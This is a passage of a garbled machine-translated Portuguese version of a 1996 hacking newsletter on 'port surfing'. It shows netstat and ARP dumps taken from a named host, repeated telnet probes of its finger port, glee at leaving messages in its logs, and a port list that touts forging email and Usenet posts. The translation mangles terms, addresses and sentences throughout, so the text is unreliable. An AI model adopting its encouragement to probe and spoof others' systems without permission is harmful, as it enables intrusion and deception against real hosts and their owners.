129.121.0 GRANDE.NM.ORG levantam 12 21658599 se0 1500 204.134.122 GLORY.NM.ORG acima, passagem 0 195 se0 1500 204.134.58 GLORY.NM.ORG acima, passagem 0 7707 se0 1500 128.123.0 GLORY.NM.ORG acima, passagem 0 34416 se0 1500 204.134.59 GLORY.NM.ORG acima, passagem 0 1007 se0 1500 204.134.124 GLORY.NM.ORG acima, passagem 0 37160 se0 1500 206.206.124 LAWRII.NM.ORG acima, passagem 0 79 se0 1500 206.206.125 PENNY.NM.ORG acima, passagem 0 233359 se0 1500 204.134.126 GLORY.NM.ORG acima, passagem 0 497 se0 1500 206.206.126 LAWRII.NM.ORG acima, passagem 0 13644 se0 1500 204.69.190 GLORY.NM.ORG acima, passagem 0 4059 se0 1500 206.206.190 GLORY.NM.ORG acima, passagem 0 1630 se0 1500 204.134.127 GLORY.NM.ORG acima, passagem 0 45621 se0 1500 206.206.191 GLORY.NM.ORG acima, passagem 0 3574 se0 1500 Tabelas de roteamento do IPX de MultiNet: MTU da relação do uso de Refcnt das bandeiras da passagem do destino ---------- ---------- ----- ------ ----- --------- ---- Tabela de MultiNet ARP: Bandeiras do Arp do endereço do Ethernet do endereço de rede do anfitrião -------------------------------------------- ---------------- --------- GLORY.NM.ORG (IP 129.121.1.4) AA:00:04:00:61:D0 provisório [DESCONHECIDO] (IP 129.121.251.1) 00:C0:05:01:2C:D2 provisório 08:00 DE NARANJO.NM.ORG (IP 129.121.1.56):87:04:9F:42 provisório CHAMA.NM.ORG (IP 129.121.1.8) AA:00:04:00:0C:D0 provisório [DESCONHECIDO] (IP 129.121.251.5) AA:00:04:00:D2:D0 provisório LAWRII.NM.ORG (IP 129.121.254.10) AA:00:04:00:5C:D0 provisório [DESCONHECIDO] (IP 129.121.1.91) 00:C0:05:01:2C:D2 provisório
  • 31. BRAVO.NM.ORG (IP 129.121.1.6) AA:00:04:00:0B:D0 provisório PENNY.NM.ORG (IP 129.121.1.10) AA:00:04:00:5F:D0 provisório 08:00 DE ARRIBA.NM.ORG (IP 129.121.1.14):2B:BC:C1:A7 provisório 08:00 DE AZUL.NM.ORG (IP 129.121.1.51):87:00:A1:D3 provisório 00:00 DE ENSS365.NM.ORG (IP 129.121.1.3):0C:51:EF:58 provisório 08:00 DE AVATAR.NM.ORG (IP 129.121.254.1):5A:1D:52:0D provisório [DESCONHECIDO] (IP 129.121.253.2) 08:00:5A:47:4A:1D provisório [DESCONHECIDO] (IP 129.121.254.5) 00:C0:7B:5F:5F:80 provisório 08:00 DE CONCHAS.NM.ORG (IP 129.121.1.11):5A:47:4A:1D provisório [DESCONHECIDO] (IP 129.121.253.10) AA:00:04:00:4B:D0 provisório Estatísticas da relação de rede de MultiNet: Endereço de rede conhecido Ipkts do MTU Ierrs Opkts Oerrs Collis ---- --- ------- -------------- ----- ----- ----- ----- ------ se0 1500 129.121.0 GRANDE.NM.ORG 68422948 0 53492833 1 0 lo0 4136 127.0.0 127.0.0.1 1188191 0 1188191 0 0 Estatísticas do protocolo de MultiNet: 65264173 pacotes do IP recebidos Tamanho menor do que mínimo de 22 pacotes do IP 6928 fragmentos do IP recebidos 4 fragmentos do IP cronometrados para fora IP 34 recebido para destinos unreachable 704140 pacotes do erro do ICMP gerados 9667 opcodes do ICMP fora da escala 4170 somas de controle más do pacote do ICMP 734363 respostas do ICMP 734363 pacotes do “eco” do ICMP recebidos 734363 do “pacotes da resposta eco” do ICMP emitidos 18339 do “pacotes da resposta eco” do ICMP recebidos 704140 ICMP do “pacotes Unreachable destino” emitidos 451243 ICMP do “pacotes Unreachable destino” recebidos o ICMP 1488 “fonte extingue” os pacotes recebidos o ICMP 163911 “reorienta” os pacotes recebidos 189732 pacotes excedidos “tempo” do ICMP recebidos 126966 conexões do TCP iniciadas 233998 conexões do TCP estabelecidas 132611 conexões do TCP aceitadas 67972 conexões do TCP deixadas cair 28182 conexões embrionárias do TCP deixadas cair 269399 conexões do TCP fechados 10711838 segmentos do TCP cronometrados para o RTT RTT actualizado de 10505140 segmentos do TCP ACKs atrasado 3927264 TCP emitido 666 devidos deixados cair conexões do TCP retransmitir intervalos de parada 111040 TCP retransmitem intervalos de parada 3136 TCP persistem intervalos de parada 9 TCP persistem gotas da conexão 16850 intervalos de parada do keepalive do TCP
  • 32. 1195 pontas de prova do keepalive do TCP emitidas 14392 deixados cair conexões do TCP devido aos intervalos de parada do keepalive 28842663 pacotes do TCP emitidos 12714484 pacotes de dados do TCP emitidos 1206060086 bytes de dados do TCP emitidos 58321 pacotes de dados do TCP retransmitidos 22144036 bytes de dados do TCP retransmitidos 6802199 pacotes do TCP ACK-somente emitidos 1502 pontas de prova da janela do TCP emitidas 483 pacotes do TCP URG-only emitidos 8906175 pacotes da Janela-Actualização-somente do TCP emitidos 359509 pacotes de controle do TCP emitidos 38675084 pacotes do TCP recebidos 28399363 pacotes do TCP recebidos em ordem 1929418386 bytes do TCP recebidos em ordem 25207 pacotes do TCP com erros da soma de controle 273374 pacotes do TCP eram duplicatas 230525708 bytes do TCP eram duplicatas 3748 pacotes do TCP tiveram alguns bytes duplicados 493214 bytes do TCP eram duplicatas parciais 2317156 pacotes do TCP eram avariados 3151204672 bytes do TCP eram avariados 1915 pacotes do TCP tiveram dados após a janela 865443 bytes do TCP eram após a janela 5804 pacotes do TCP para a conexão já fechado 941 pacotes do TCP eram pontas de prova da janela 10847459 pacotes do TCP tiveram ACKs 222657 pacotes do TCP tiveram ACKs duplicado 1 dados unsent de ACKed do pacote do TCP 1200274739 bytes ACKed do TCP 141545 pacotes do TCP tiveram actualizações da janela 13 deixados cair segmentos do TCP devido às PATAS 4658158 segmentos do TCP eram puros-ACKs previsto 24033756 segmentos do TCP eram puro-dados previstos 8087980 faltas de esconderijo do PWB do TCP 305 somas de controle más do encabeçamento do UDP 17 campos maus do comprimento de dados do UDP 23772272 faltas de esconderijo do PWB do UDP Estatísticas do amortecedor de MultiNet: 388 de 608 amortecedores no uso: 30 amortecedores alocados aos dados. 10 amortecedores alocados aos encabeçamentos de pacote. 66 amortecedores alocados às estruturas do soquete. 57 amortecedores alocados aos blocos de controle do protocolo. 163 amortecedores alocados às entradas de tabela do roteamento. 2 amortecedores alocados aos nomes e aos endereços do soquete. 48 amortecedores alocados aos Forquilha-Processos da semente.
  • 33. 2 amortecedores alocados aos endereços da relação. 1 amortecedor alocado para multicast endereços. 1 amortecedor alocado às rechamadas do intervalo de parada. 6 amortecedores alocados à gerência de memória. 2 amortecedores alocados aos blocos de controle do TTY da rede. 11 de 43 conjuntos da página no uso. 11 CXBs pedido dos excitadores de dispositivo do VMS 2 CXBs que espera para retornar aos excitadores de dispositivo do VMS 162 Kbytes alocados aos amortecedores de MultiNet (44% no uso). 226 Kbytes do espaço de endereço alocado do amortecedor (0% do máximo). Conexão fechado pelo anfitrião extrangeiro. <slug> [68] - > Whoa! Que era todo o isso? O que nós fizemos era telnet para mover 15 -- o porto do netstat-- qual em alguns computadores funciona um demónio que diga qualquer um que se importa para deixar cair apenas em aproximadamente tudo sobre a conexão feita por todos os computadores lig ao Internet através deste computador. Assim desta nós aprendemos duas coisas: Grande.nm.org é um computador muito ocupado e importante. Mesmo um computador muito ocupado e importante pode deixar o surfista portuário aleatório vir e jogar. Assim meu amigo de senhora quis tentar um outro porto. Eu sugeri o porto do dedo, número 79. Assim deu o comando: >telnet grande.nm.org 79 do <slug> [68] - 129.121.1.2 de tentativa… Conectado a grande.nm.org. O carácter de escape é “^]”. dedo ?Pesaroso, não podia encontrar o “DEDO” Conexão fechado pelo anfitrião extrangeiro. >telnet grande.nm.org 79 do <slug> [69] - 129.121.1.2 de tentativa… Conectado a grande.nm.org. O carácter de escape é “^]”. ajuda ?Pesaroso, não podia encontrar a “AJUDA” Conexão fechado pelo anfitrião extrangeiro. >telnet grande.nm.org 79 do <slug> [69] - 129.121.1.2 de tentativa… Conectado a grande.nm.org. O carácter de escape é “^]”. ? ?Pesaroso, não podia encontrar “?” Conexão fechado pelo anfitrião extrangeiro. >telnet grande.nm.org 79 do <slug> [69] - 129.121.1.2 de tentativa… Conectado a grande.nm.org.
  • 34. O carácter de escape é “^]”. homem ?Pesaroso, não podia encontrar o “HOMEM” Conexão fechado pelo anfitrião extrangeiro. <slug> [69] - > Início neste olha como apenas um grupo de comandos falhs. Mas realmente isto é consideravelmente fascinante. A razão é que o porto 79 é, sob o IETF governa, supor para funcionar o fingerd, demónio do dedo. Assim quando deu o comando “dedo” e grande.nm.org disse?Pesarosos, não poderíamos encontrar o “DEDO,” nós soubemos que este porto não era seguintes réguas do IETF. Agora podem sobre os computadores que não funcionam o demónio do dedo de todo. Isto é porque o dedo tem assim as propriedades que podem ser usadas para ganhar o controle total do computador que funcionamentos ele. Mas se o dedo é interrompido, e nada mais está funcionando no porto 79, nós começ a resposta: telnet: conectar: Conexão recusada. Mas preferivelmente nós começ conectados e grande.nm.org esperava um comando. Agora a coisa normal um surfista portuário faz quando funcionar um demónio unfmiliar é a persuadir em revelar que comandos usa. “Ajuda,” “?” e trabalho do “homem” frequentemente. Mas não nos ajudou. Mas mesmo que estes comandos não nos ajudassem, disseram-nos que o demónio é provavelmente algo sensível. Se era um demónio que fosse significado para que qualquer um e seu irmão se use, dar-nos-ia instruções. Assim que nós fizemos em seguida? Nós decidimos ser bons cidadãos do Internet e permanecer igualmente fora da cadeia que nós decidimos que nós término de uma sessão do beter. Mas havia um corte que nós decidimos fazer primeiramente: deixar nossa marca na lima de registro do escudo. A lima de registro do escudo mantem um registro de todos os comandos do sistema de exploração feitos em um computador. O adminsitrator de um computador obviamente importante tal como grande.nm.org é provavelmente competente bastante fazer a varredura dos registros de que comandos são dados quem a seu computador. Especialmente em um importante portuário bastante funcionar um mistério, demónio não-IETF. Tão tudo nós tipos quando conectados fomos conservados em um registro. Assim meu amigo giggled com alegria e deixou algumas mensagens no porto 79 antes de finalizar a sessão. Oh, caro, eu acredito que enganchou no corte. Hmmm, podia ser uma boa maneira de encontrar sysadmins bonitos… Assim, ressaca portuária acima! Se você quer surfar, estão aqui os princípios: Começ entrado a um cliente de escudo. Aquele é um cliente com seu ISP que o deixa dar comandos de Unix. Ou -- funcionar o linux ou o algum outro tipo de Unix em seus PC e gancho até o Internet. Dar o comando do “number> do <pot do <hostname> telnet “onde o <hostname> é o internet address do computador que você quer visitar e number> do <port é o que quer que lhe olha o phun. Se você começ a resposta “conectada ao <hostname>,” então ressaca acima!
  • 35. Seguir é alguns de meus portos favoritos. É legal e inofensivo pagar-lhes visitas contanto que você não figura para fora como ganhar o status do superuser ao jogar com elas. Entretanto, anotar por favor que se você faz demasiado porto que surfa de seu cliente de escudo, seu sysadmin pode observar este em sua lima de registro do escudo. Se ou são prejudic de encontro ao corte, você pode começ retrocedido fora seu ISP. Assim você pode querer explicar adiantado que você é meramente um cabouqueiro inofensivo que olha para ter uma boa estadia, er, um, aprende sobre Unix. Yeh, de que soa bom… Serviço do número portuário porque é phun! 7 eco o que quer que você dactilografa dentro, as repetições do anfitrião de volta a você, usado para o sibilo colaborador de 9 descartes/zero -- como rapidamente pode você figurar para fora este? 11 lotes do systat da informação em usuários hora e data do dia 13 na posição do computador informação tremenda de 15 netstat em redes mas usada raramente mais o chargen 19 derrama para fora um córrego de carácteres de ASCII. Usar o ^C para parar. 21 limas de transferências do ftp início de uma sessão seguro do escudo de 22 ssh -- túnel cifrado telnet 23 onde você entra se você não usa o ssh:) email da forja de 25 smpt de Bill.Gates@Microsoft.org. tempo de 37 vezes posição do recurso de 39 rlp informação do WHOIS 43 em anfitriões e em redes domain name server 53 caçador expirado da informação do Gopher 70 79 lotes do dedo da informação em usuários web server do HTTP 80 email entrante de 110 PNF 119 grupos da notícia de USENET do NNTP -- bornes da forja, cancelamentos shttp 443 um outro web server notificação do correio do biff 512 remote login do rlogin 513 quem remoto quem e uptime comando remoto de 514 escudos, nenhuma senha usada! registo do sistema remoto do syslog -- como nós rebentamos cabouqueiros Routing Information Protocol de 520 rotas ************************** Ponta da cabeça da hélice: Anotar que na maioria dos casos um anfitrião do Internet usará estas atribuições do número portuário para estes serviços. Mais de um serviço pode igualmente ser atribuído simultaneamente ao mesmo porto. Este sistema de numeração é oferecido voluntàriamente pelo Internet Engineering Task Force. Isso significa que um anfitrião do Internet pode usar outros portos para estes serviços. Esperar o inesperado! Se você tem uma cópia do linux, você pode começ a lista de todas as atribuições do IETF dos números portuários na lima /etc/services.
  • 36. ******************************** _______________________________________________________ Para subscrever à lista feliz do cabouqueiro, o email hacker@techbroker.com com messge “subscreve o hh.” Emitir-me nenhuns exames das actividades ilegais) o uso confidencial cmeinel@techbroker.com do email (por favor. Dirigir por favor flamas ao colaborador/null@techbroker.com. Corte feliz! Direitos reservados Carolyn 1996 P. Meinel. Você pode enviar o GUIA (na maior parte) AO CORTE INOFENSIVO contanto que você deixar esta observação na extremidade. ______________________________________________________